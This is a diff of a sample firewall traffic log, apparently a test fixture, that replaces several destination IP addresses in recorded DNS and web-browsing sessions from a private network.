 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
